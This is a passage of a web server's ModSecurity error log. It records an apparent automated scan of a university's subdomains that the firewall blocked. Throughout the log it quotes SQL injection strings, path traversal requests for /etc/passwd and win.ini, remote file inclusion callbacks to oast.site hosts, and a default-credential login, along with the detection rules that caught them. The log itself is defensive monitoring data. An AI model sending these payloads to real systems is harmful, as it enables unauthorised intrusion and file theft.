"pusatbahasa.unla.ac.id"] [uri "/api/v1/repos/search"] [unique_id "ZO13s8Co-f0AAAg@-@0AAAAQ"]
[Tue Aug 29 11:44:35.418557 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gy4nt68i4xxens.oast.site found within TX:1: cjmnbitjmimt14dgn26gy4nt68i4xxens.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/composer/send_email"] [unique_id "ZO13s8Co-f0AAAfGaeAAAAAT"]
[Tue Aug 29 11:44:35.435322 2023] [:error] [pid 2110] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ())\\x09 found within ARGS:q: ')\\x09UNION\\x09SELECT\\x09*\\x09FROM\\x09(SELECT\\x09null)\\x09AS\\x09a1\\x09\\x09JOIN\\x09(SELECT\\x091)\\x09as\\x09u\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b1\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b2\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a3\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a4\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a5\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a6\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a7\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a8\\x09\\x09JOIN\\x09..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/v1/repos/search"] [unique_id "ZO13s8Co-f0AAAg@-@4AAAAQ"]
[Tue Aug 29 11:44:35.435725 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gkmiu3nfg95buw.oast.site found within TX:1: cjmnbitjmimt14dgn26gkmiu3nfg95buw.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/composer/send_email"] [unique_id "ZO13s8Co-f0AAAhBR@8AAAAX"]
[Tue Aug 29 11:44:35.437422 2023] [:error] [pid 2021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ())\\x09 found within ARGS:q: ')\\x09UNION\\x09SELECT\\x09*\\x09FROM\\x09(SELECT\\x09null)\\x09AS\\x09a1\\x09\\x09JOIN\\x09(SELECT\\x091)\\x09as\\x09u\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b1\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b2\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a3\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a4\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a5\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a6\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a7\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a8\\x09\\x09JOIN\\x09..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/v1/repos/search"] [unique_id "ZO13s8Co-f0AAAfloUYAAAAj"]
[Tue Aug 29 11:44:35.445618 2023] [:error] [pid 2104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ())\\x09 found within ARGS:q: ')\\x09UNION\\x09SELECT\\x09*\\x09FROM\\x09(SELECT\\x09null)\\x09AS\\x09a1\\x09\\x09JOIN\\x09(SELECT\\x091)\\x09as\\x09u\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b1\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b2\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a3\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a4\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a5\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a6\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a7\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a8\\x09\\x09JOIN\\x09..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/v1/repos/search"] [unique_id "ZO13s8Co-f0AAAg4DZgAAAAI"]
[Tue Aug 29 11:44:35.497389 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ())\\x09 found within ARGS:q: ')\\x09UNION\\x09SELECT\\x09*\\x09FROM\\x09(SELECT\\x09null)\\x09AS\\x09a1\\x09\\x09JOIN\\x09(SELECT\\x091)\\x09as\\x09u\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b1\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b2\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a3\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a4\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a5\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a6\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a7\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a8\\x09\\x09JOIN\\x09..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/v1/repos/search"] [unique_id "ZO13s8Co-f0AAAfiYooAAAAg"]
[Tue Aug 29 11:44:36.365419 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gz5qs9zwub9pyk.oast.site found within TX:1: cjmnbitjmimt14dgn26gz5qs9zwub9pyk.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/composer/send_email"] [unique_id "ZO13tMCo-f0AAAdftj8AAAAG"]
[Tue Aug 29 11:44:36.391103 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ())\\x09 found within ARGS:q: ')\\x09UNION\\x09SELECT\\x09*\\x09FROM\\x09(SELECT\\x09null)\\x09AS\\x09a1\\x09\\x09JOIN\\x09(SELECT\\x091)\\x09as\\x09u\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b1\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b2\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a3\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a4\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a5\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a6\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a7\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a8\\x09\\x09JOIN\\x09..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/v1/repos/search"] [unique_id "ZO13tMCo-f0AAAdftkAAAAAG"]
[Tue Aug 29 11:44:36.414443 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gqznayqq41iyro.oast.site found within TX:1: cjmnbitjmimt14dgn26gqznayqq41iyro.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/composer/send_email"] [unique_id "ZO13tMCo-f0AAAg-pHIAAAAR"]
[Tue Aug 29 11:44:43.525685 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/mypixs/mypixs/downloadpage.php"] [unique_id "ZO13u8Co-f0AAAfg71gAAAAe"]
[Tue Aug 29 11:44:43.544004 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/mypixs/mypixs/downloadpage.php"] [unique_id "ZO13u8Co-f0AAARphFgAAAAU"]
[Tue Aug 29 11:44:43.558789 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/mypixs/mypixs/downloadpage.php"] [unique_id "ZO13u8Co-f0AAAfVkdgAAAAD"]
[Tue Aug 29 11:44:43.596780 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/mypixs/mypixs/downloadpage.php"] [unique_id "ZO13u8Co-f0AAAfVkdkAAAAD"]
[Tue Aug 29 11:44:44.359258 2023] [:error] [pid 2120] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:name: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/jnoj/web/polygon/problem/viewfile"] [unique_id "ZO13vMCo-f0AAAhISNoAAAAH"]
[Tue Aug 29 11:44:44.379511 2023] [:error] [pid 2110] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/mypixs/mypixs/downloadpage.php"] [unique_id "ZO13vMCo-f0AAAg@AAQAAAAQ"]
[Tue Aug 29 11:44:44.383627 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:name: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/jnoj/web/polygon/problem/viewfile"] [unique_id "ZO13vMCo-f0AAAfg71wAAAAe"]
[Tue Aug 29 11:44:44.383849 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:name: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/jnoj/web/polygon/problem/viewfile"] [unique_id "ZO13vMCo-f0AAAgzyP0AAAAF"]
[Tue Aug 29 11:44:44.391427 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:name: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/jnoj/web/polygon/problem/viewfile"] [unique_id "ZO13vMCo-f0AAAfVkeIAAAAD"]
[Tue Aug 29 11:44:44.427799 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:name: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/jnoj/web/polygon/problem/viewfile"] [unique_id "ZO13vMCo-f0AAAfGafYAAAAT"]
[Tue Aug 29 11:44:44.429293 2023] [:error] [pid 2110] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/mypixs/mypixs/downloadpage.php"] [unique_id "ZO13vMCo-f0AAAg@AAUAAAAQ"]
[Tue Aug 29 11:44:45.593147 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:name: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/jnoj/web/polygon/problem/viewfile"] [unique_id "ZO13vcCo-f0AAAfZj8EAAAAN"]
[Tue Aug 29 11:44:47.362963 2023] [:error] [pid 2124] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/spreadsheet-reader/test.php"] [unique_id "ZO13v8Co-f0AAAhMtTUAAAAM"]
[Tue Aug 29 11:44:47.639267 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/spreadsheet-reader/test.php"] [unique_id "ZO13v8Co-f0AAAfSWeIAAAAB"]
[Tue Aug 29 11:44:47.657037 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/spreadsheet-reader/test.php"] [unique_id "ZO13v8Co-f0AAAfVkfYAAAAD"]
[Tue Aug 29 11:44:47.660460 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/spreadsheet-reader/test.php"] [unique_id "ZO13v8Co-f0AAAdOee4AAAAS"]
[Tue Aug 29 11:44:47.675693 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:redirect: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13v8Co-f0AAAdQ3tgAAAAV"]
[Tue Aug 29 11:44:47.682021 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/spreadsheet-reader/test.php"] [unique_id "ZO13v8Co-f0AAARphGgAAAAU"]
[Tue Aug 29 11:44:47.684366 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"username":"admin","password":"public"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22username\\x22:\\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/api/v4/auth"] [unique_id "ZO13v8Co-f0AAAdOee8AAAAS"]
[Tue Aug 29 11:44:47.685636 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"public"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/api/v4/auth"] [unique_id "ZO13v8Co-f0AAAfVkfcAAAAD"]
[Tue Aug 29 11:44:47.689113 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"username":"admin","password":"public"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22username\\x22:\\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "informatika.unla.ac.id"] [uri "/api/v4/auth"] [unique_id "ZO13v8Co-f0AAAfg73AAAAAe"]
